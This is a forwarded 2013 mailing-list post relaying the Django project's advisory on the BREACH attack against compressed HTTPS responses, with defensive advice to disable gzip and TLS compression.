----- Forwarded message from Josh Steiner -----
Date: Tue, 6 Aug 2013 11:06:10 -0700
From: Josh Steiner
To: Guardian Dev
Subject: [guardian-dev] BREACH: SSL is pwnd
in summary, you need to turn off gzip to mitigate this for now:
http://breachattack.com/
https://www.djangoproject.com/weblog/2013/aug/06/breach-and-django/
At last week's Black Hat conference, researchers announced the BREACH
attackhttp://breachattack.com/,
a new attack on web apps that can recover data even when secured with SSL
connections. The BREACH
paperhttp://breachattack.com/resources/BREACH%20-%20SSL,%20gone%20in%2030%20secon...
(PDF)
contains full details (and is a good and fairly easy read).
Given what we know so far, we believe that *BREACH may be used to
compromise Django's CSRF protection*. Thus, we're issuing this advisory so
that our users can defend themselves.
BREACH takes advantage of vulnerabilities when serving compressed data over
SSL/TLS. Thus, to protect yourself from BREACH, you should disable
compression of web responses. Depending on how your application is
deployed, this could take a couple forms:
1. Disabling Django's GZip
middlewarehttps://docs.djangoproject.com/en/dev/ref/middleware/#module-django.middlewa...
.
2. Disabling GZip compression in your web server's config. For example,
if you're using Apache you'd want to disable
mod_deflatehttp://httpd.apache.org/docs/2.2/mod/mod_deflate.html;
in nginx you'd disable the gzip modulehttp://wiki.nginx.org/HttpGzipModule
.
Additionally, you should make sure you disable TLS compression by adjusting
your server's SSL
ciphershttp://hynek.me/articles/hardening-your-web-servers-ssl-ciphers/
.
We plan to take steps to address BREACH in Django itself, but in the
meantime we recommend that all users of Django understand this
vulnerability and take action if appropriate.
Posted by *Jacob Kaplan-Moss* on August 6, 2013
_______________________________________________
Guardian-dev mailing list
Post: Guardian-dev@lists.mayfirst.org
List info: https://lists.mayfirst.org/mailman/listinfo/guardian-dev
To Unsubscribe
Send email to: Guardian-dev-unsubscribe@lists.mayfirst.org
Or visit: https://lists.mayfirst.org/mailman/options/guardian-dev/eugen%40leitl.org
You are subscribed as: eugen@leitl.org
----- End forwarded message -----
--
Eugen* Leitl <a href="http://leitl.org">leitl</a> http://leitl.org
______________________________________________________________
ICBM: 48.07100, 11.36820 http://ativel.com http://postbiota.org
AC894EC5: 38A5 5F46 A4FF 59B8 336B 47EE F46E 3489 AC89 4EC5